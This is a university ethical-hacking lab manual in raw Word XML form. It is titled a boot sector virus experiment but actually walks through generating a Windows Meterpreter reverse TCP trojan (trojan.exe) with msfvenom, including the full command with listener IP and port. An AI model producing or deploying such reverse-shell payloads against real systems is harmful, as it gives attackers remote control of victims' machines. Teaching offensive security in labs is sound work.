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ITA1447 - ETHICAL HACKING FOR ENUMERATING WINDOWS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="10" w:space="6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LAB MANUAL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Experiment No: 9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Implement the Boot Sector Virus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Aim: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 generate a payload (trojan/virus) using msfvenom in Kali Linux for understanding boot sector / executable-based malware.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a terminal in Kali Linux and update the system package list using: sudo apt-get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Upgrade installed packages using: sudo apt-get upgrade.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any bundler-related errors appear, navigate to the Metasploit framework directory using: cd /usr/share/metasploit-framework/.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Install the bundler gem using: gem install bundler.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Run: bundle install to install the required dependencies for the Metasploit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a specific bundler version is required, install that version using: gem install bundler:[version number], then update the system using: gem update --system.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Return to the root directory using: cd /root.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msfvenom tool by typing msfvenom in the terminal to view its usage and available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 all the available payloads using: msfvenom -l payloads, and review the list of payloads for different platforms (Windows, Android, Linux,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an appropriate payload for the target, such as windows/meterpreter/reverse_tcp.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the configurable options for the chosen payload using: msfvenom --list-options -p windows/meterpreter/reverse_tcp, noting required fields such as LHOST (listener IP) and LPORT (listener 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Construct the final msfvenom command using the syntax: msfvenom -p [payload] LHOST=[your IP address] LPORT=[port number] -f [file type] &gt; [output path].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Execute the command to generate the malicious executable, for example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.253 LPORT=4444 -f exe &gt; trojan.exe.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Verify that the payload file (trojan.exe) has been successfully created in the specified directory.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the steps and output for the report, noting that this payload would typically be paired with a Metasploit listener (multi/handler) to establish a reverse connection.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Syntax &amp; Example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msfvenom -p [payload] LHOST=[your ip address] LPORT=[port] -f [file type] &gt; [path]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Example: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.253 \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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">         LPORT=4444 -f exe &gt; trojan.exe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Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905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511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4419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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905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Result: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msfvenom was used to successfully generate a Windows Meterpreter reverse TCP payload (trojan.exe) using the specified LHOST and LPORT values.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451b87a87cf78a349adbf6e09833b5758caf7d.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fabdbedce66e882dda90c265584861ee89aa0790.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c05a349f68d8c6fd8e79d631c5e78250de907ded.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bf26047ad850046273c632291642a3eaccd3cbcf.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/784d08d3072e9d7c90254264665c04929667b3b7.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/628c950f4d6c730bd562cb48456128924fa2f1c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2026-10-13T08:04:01.095Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-13T08:04:01.095Z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